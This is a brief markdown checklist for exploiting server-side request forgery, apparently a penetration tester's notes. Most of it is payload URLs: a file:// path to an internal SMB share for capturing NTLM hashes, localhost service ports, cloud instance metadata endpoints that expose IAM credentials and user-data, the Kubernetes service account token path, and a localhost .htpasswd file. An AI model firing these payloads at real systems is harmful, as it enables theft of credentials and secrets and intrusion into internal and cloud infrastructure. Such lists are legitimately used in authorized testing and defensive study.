# SSRF

If you've determined you can control server side requests, there are many things to ALWAYS check.

If it's a windows box, you may be able to steal NTLM hashes with `file://///10.1.1.1/smb/file.txt`. This does require FIVE FORWARD SLASHES sometimes!

Check for any other internal service which may be open on localhost only.

```bash
ftp://localhost
http://localhost:8000
http://localhost:8080
```

Try to find internal secrets or instance metadata!

```
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
/var/run/secrets/kubernetes.io/serviceaccount/token
```

Check for any restricted pages which may show additional information to the server

```bash
http://localhost/.htpasswd
```